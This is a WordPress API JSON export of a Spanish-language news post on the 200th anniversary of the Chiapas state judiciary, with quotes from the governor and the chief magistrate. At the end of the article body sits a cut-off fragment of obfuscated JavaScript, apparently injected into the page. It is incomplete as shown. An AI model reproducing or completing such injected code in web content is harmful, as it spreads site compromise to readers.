{"id":21785,"date":"2025-05-07T02:37:37","date_gmt":"2025-05-07T02:37:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21785"},"modified":"2025-05-07T02:37:37","modified_gmt":"2025-05-07T02:37:37","slug":"poder-judicial-conmemora-200-anos-de-historia-reafirmando-su-compromiso-con-la-justicia-y-la-paz-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21785","title":{"rendered":"Poder Judicial conmemora 200 a\u00f1os de historia reafirmando su compromiso con la justicia y la paz en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21787\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0023-1024x682.jpg\" alt=\"\" class=\"wp-image-21787\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0023-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0023-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0023-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0023-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0023.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"874\" data-id=\"21786\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0025-1024x874.jpg\" alt=\"\" class=\"wp-image-21786\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0025-1024x874.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0025-300x256.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0025-768x656.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0025-1536x1311.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0025.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"740\" data-id=\"21788\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0024-1024x740.jpg\" alt=\"\" class=\"wp-image-21788\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0024-1024x740.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0024-300x217.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0024-768x555.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0024-1536x1110.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0024-2048x1480.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"21789\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0022-1024x682.jpg\" alt=\"\" class=\"wp-image-21789\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0022-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0022-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0022-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0022-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0022.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"21790\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0021-1024x683.jpg\" alt=\"\" class=\"wp-image-21790\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0021-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0021-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0021-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0021-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0021-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"21791\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0020-1024x683.jpg\" alt=\"\" class=\"wp-image-21791\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0020-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0020-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0020-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0020-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0020-2048x1365.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"684\" data-id=\"21792\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0019-1024x684.jpg\" alt=\"\" class=\"wp-image-21792\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0019-1024x684.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0019-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0019-768x513.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250506-WA0019.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>-&#8220;A 200 a\u00f1os, vemos en las y los impartidores de justicia en Chiapas, un \u00f3rgano colegiado que le responde verdaderamente a los intereses del pueblo\u201d: Eduardo Ram\u00edrez Aguilar.<\/p>\n\n\n\n<p>-\u201cEste tribunal del siglo XXI representa la esperanza de las y los justiciables para acceder a sus demandas de justicia humanista, puntual, imparcial y apagada a la ley como m\u00e1xima primicia, pero, sobre todo, a la realidad que vivimos en el d\u00eda a d\u00eda\u201d: Juan Carlos Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>En el marco del Bicentenario de la Instalaci\u00f3n del Poder Judicial del Estado de Chiapas, la casa de la justicia realiz\u00f3 este martes una serie de actividades con profundo significado para la historia estatal, encabezadas por el gobernador del estado, Eduardo Ram\u00edrez Aguilar, junto al magistrado presidente Juan Carlos Moreno Guill\u00e9n, reafirmando as\u00ed su compromiso con una justicia humanista, cercana y comprometida con la paz social.<\/p>\n\n\n\n<p><em>Mesa de Paz Chiapas: trabajo conjunto por la tranquilidad de las y los chiapanecos<\/em><\/p>\n\n\n\n<p>Arrancando con la agenda del d\u00eda, desde las instalaciones del Poder Judicial del Estado, el gobernador Eduardo Ram\u00edrez Aguilar y el magistrado presidente Juan Carlos Moreno Guill\u00e9n participaron en la Mesa de Paz Chiapas, en un espacio de coordinaci\u00f3n interinstitucional donde se analizaron estrategias de seguridad junto a integrantes del Gabinete de Seguridad y las Fuerzas Armadas.<\/p>\n\n\n\n<p>En este encuentro, el magistrado presidente refrend\u00f3 el compromiso del Poder Judicial en el fortalecimiento de una cultura de paz en todos los municipios del estado, destacando la importancia del trabajo articulado como base para garantizar la justicia y la tranquilidad de las y los chiapanecos.<\/p>\n\n\n\n<p><em>Ceremonia Solemne por el Bicentenario del Poder Judicial<\/em><\/p>\n\n\n\n<p>Como parte de las actividades conmemorativas, desde el vest\u00edbulo de La Jurisprudencia en el palacio de justicia de Tuxtla, posteriormente se realiz\u00f3 una Ceremonia Solemne por el Bicentenario de la Instalaci\u00f3n del Poder Judicial en Chiapas. En este acto, el gobernador Eduardo Ram\u00edrez Aguilar reconoci\u00f3 a las y los impartidores de justicia por su labor comprometida y su papel clave en el restablecimiento de la paz y la legalidad.<\/p>\n\n\n\n<p>\u201cA 200 a\u00f1os, nosotros vemos en las y los impartidores de justicia en Chiapas un \u00f3rgano colegiado que le responde a los intereses del pueblo; vemos su entrega para que la justicia est\u00e9 cerca de todas y todos. Quiero hacer un reconocimiento en este presente, porque gracias a la actuaci\u00f3n de juezas y jueces que est\u00e1n muy comprometidos con la paz, hoy en Chiapas las y los delincuentes no est\u00e1n en la calle, est\u00e1n en la c\u00e1rcel\u201d, manifest\u00f3 Ram\u00edrez Aguilar.<\/p>\n\n\n\n<p>Por su parte, el magistrado presidente Moreno Guill\u00e9n dirigi\u00f3 un mensaje en el que se resalt\u00f3 la transcendencia de esta conmemoraci\u00f3n, no s\u00f3lo hist\u00f3rica, sino social, como un llamado a continuar la labor y el legado de las mujeres y hombres que labraron el camino de esta casa de la justicia.<\/p>\n\n\n\n<p>\u201cEste tribunal del siglo XXI representa la esperanza de las y los justiciables para acceder a sus demandas de justicia, una justicia humanista y puntual, imparcial y apagada a la ley como m\u00e1xima primicia, pero, sobre todo, a la realidad que vivimos en el d\u00eda a d\u00eda\u201d, exhort\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Durante el evento se devel\u00f3 la Placa Conmemorativa del Bicentenario y se cont\u00f3 con la participaci\u00f3n de la ministra en retiro de la Suprema Corte de Justicia de la Naci\u00f3n, Margarita Luna Ramos, quien enfatiz\u00f3 el valor hist\u00f3rico de esta conmemoraci\u00f3n y la evoluci\u00f3n del sistema judicial a lo largo de dos siglos.<\/p>\n\n\n\n<p><em>Con conferencia magistral se fortalece la memoria hist\u00f3rica y la cultura jur\u00eddica<\/em><\/p>\n\n\n\n<p>Finalmente, para concluir con el programa conmemorativo, se llev\u00f3 a cabo la conferencia magistral \u201cFuentes para el estudio de Chiapas\u201d, impartida por el director del Archivo General del Estado, Carlos Rom\u00e1n Garc\u00eda, quien hizo hincapi\u00e9 en la trascendencia de las fuentes documentales hist\u00f3ricas para comprender los procesos sociales, jur\u00eddicos y pol\u00edticos que han marcado el devenir del estado de Chiapas.<\/p>\n\n\n\n<p>El Poder Judicial del Estado refrenda as\u00ed su compromiso con la formaci\u00f3n acad\u00e9mica, la preservaci\u00f3n de la memoria hist\u00f3rica y el fortalecimiento institucional, en un momento clave que marca 200 a\u00f1os de servicio a la justicia en Chiapas, como pauta para el inicio de una nueva era, donde la justicia es la paz.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-&#8220;A 200 a\u00f1os, vemos en las y los impartidores de justicia en Chiapas, un \u00f3rgano colegiado que le responde verdaderamente a los intereses del pueblo\u201d: Eduardo Ram\u00edrez Aguilar. -\u201cEste tribunal del siglo XXI representa la esperanza de las y los justiciables para acceder a sus demandas de justicia humanista, puntual, imparcial y apagada a la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21787,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21785","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21785","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21785"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21785\/revisions"}],"predecessor-version":[{"id":21793,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21785\/revisions\/21793"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21787"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21785"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21785"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21785"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}